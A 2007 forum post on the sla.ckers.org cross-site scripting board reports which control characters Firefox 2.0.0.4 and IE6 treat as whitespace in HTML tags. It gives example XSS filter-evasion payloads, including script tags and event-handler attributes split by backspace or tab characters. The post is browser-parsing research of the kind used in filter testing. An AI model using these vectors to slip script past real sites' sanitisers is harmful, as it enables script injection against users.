Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
non alpha non digit
Posted by: tx
Date: July 04, 2007 02:23AM

I was playing around with the non-alpha-non-digit vectors and I found some changes in FF (2.0.0.4)
For instance <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> will no longer work; however, there are certain characters that are still are treated as whitespace. Namely BS,HT,NL,VT,NP & CR:

Characters 08,09,10,11,12,13 can follow the word script in a script tag.
Example: <script[BS]>alert(8)</script>

Characters 08,09 can follow the word script in the closing script tag
Example: <script>alert(8)</script[BS]>

Characters 08,09,10,13 can be placed between the tagname and any attributes instead of a space (I've tested this with <script>,<p>,<body>,<div> and <textarea> tags.)
Examples: <textarea[BS]onmouseover="this.style.backgroundColor='#f02';">xss!</textarea>
<script[BS]src='xss.js'></script>

Additionally characters 08,09,10 & 13 can follow = after an event handler

Example: <textarea onmouseover=[BS]"this.style.backgroundColor='#f02';">xss!</textarea>

IE6 treats all of the above characters as whitespace as well, except BS.

I made an html page here: http://tx.lowtechlive.com/nand.html

EDIT: Since the characters display properly, in the above examples [BS] represents the backspace character (%08)

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 07/04/2007 02:30AM by tx.

Options: ReplyQuote


Sorry, only registered users may post in this forum.